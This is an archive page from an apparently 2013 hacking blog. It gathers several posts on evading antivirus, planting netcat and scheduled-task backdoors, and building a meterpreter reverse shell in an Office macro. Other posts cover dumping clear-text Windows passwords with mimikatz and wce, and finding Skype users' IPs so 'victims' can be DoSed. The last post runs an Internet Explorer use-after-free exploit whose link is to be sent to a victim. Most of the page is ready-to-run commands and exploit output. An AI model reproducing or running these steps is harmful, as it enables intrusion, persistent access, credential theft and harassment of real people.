Wednesday, October 30, 2013

List of Differnet AV evasion Frameworks.

5 comments
Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-


Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

Antivirus Evasion

Thursday, October 24, 2013

Backdoor using Netcat, cryptcat , ncat.

3 comments
Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker `s I.P : 192.168.56.1

Victim`s I.P.     : 192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-


Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start  netcat listener. Here is tutorial on how to create netcat backdoor?

But if you know about method used in that tutorial ; there are some disadvantages of using netcat.

(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection  possible by AV.

netcat-virustotal


(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.

netcat-capture-traffic-using-wireshark

Friday, October 18, 2013

Get shell Using Shellcode in Macro.

2 comments
We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit

Monday, October 14, 2013

How to detect Avast Antivirus remotely?

0 comments
During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?

Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.

How-to-detect-Avast-Antivirus-remotely

Friday, October 11, 2013

Fun with skype resolver

3 comments
Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.

If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you got reply use following command.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have I.P. of victim.

In most situation our victim is not in our friend-list. So for that situation, we will going to use online skype resolver.You can also use bash script for getting ip of victim which i wrote.

root@bt:~# git clone https://github.com/niravkdesai/skypersolver.sh

root@bt:~# cd skypersolver.sh/

root@bt:~/skypersolver.sh# sh skypersolver.sh


Use one of following  links to get I.P. of your victim using his skype user-name.

(1)http://www.skyperesolver.com/

(2)http://skresolver.com/

(3)http://www.speedresolve.com/resolve.php

(4)http://skypegrab.com/skype-beta

(5)http://iskyperesolve.com/

Okay we got I.P. Now you can directly DOS or DDOS( ddos and dos attacks are illegal) them . But we are going to use different technique to shutdown your victim pc using RDP.

First scan ip to find open ports of victim.

root@bt:~# nmap 192.168.56.101

Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-11 18:41 IST
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 995 filtered ports
PORT      STATE  SERVICE
139/tcp     open   netbios-ssn
445/tcp     open   microsoft-ds
2869/tcp   closed icslap
3389/tcp   open   ms-wbt-server
10243/tcp closed unknown
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)

nmap-scan

Monday, October 7, 2013

Get shell using Missing Autoruns.

0 comments
In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.

(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.

After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.

(1)Get meterpreter shell.

(2)Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.

(3)Now from uploaded directory execute following command to get missing autoruns of machine

autorunsc.exe -a | findstr /n /R "File\ not\ found"

(4)Now we have list of file which is missing ; these files are run at startup time.

missing-autoruns

Friday, October 4, 2013

Schedule Task in windows after Exploitation.

1 comments
Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.

After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.

First create one batch file , put following code in it

@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"


Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.

Get clear text password:-

Following are different methods to get clear text password of windows.

(1)using mimikatz or wce get clear text password of victim.

(2) You can also use mimikatz password dump method .

(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.

   meterpreter > load mimikatz
   meterpreter > help mimikatz
   meterpreter > kerberos
   meterpreter > mimikatz_command -h
   meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4)You can use wce & mimikatz in memory without uploading binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

get-clear-text-password
So till now i upload one batch file ; backdoor & get clear text password.

Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.

C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00

It will ask to enter password which we got before.

schedule-task

You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.

Tuesday, October 1, 2013

Exploit For All IE version(CVE-2013-3893).

0 comments
Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well.

For more technical Detail view metasploit blog here

The Metasploit module currently can be only tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed,


msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set uripath /
uripath => /
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set lport 443
lport => 443
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.1:443
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.


Send this link to victim. As soon as he open link you will get meterpreter shell.

exploit-for-CVE-2013-3893

UA-35960349-1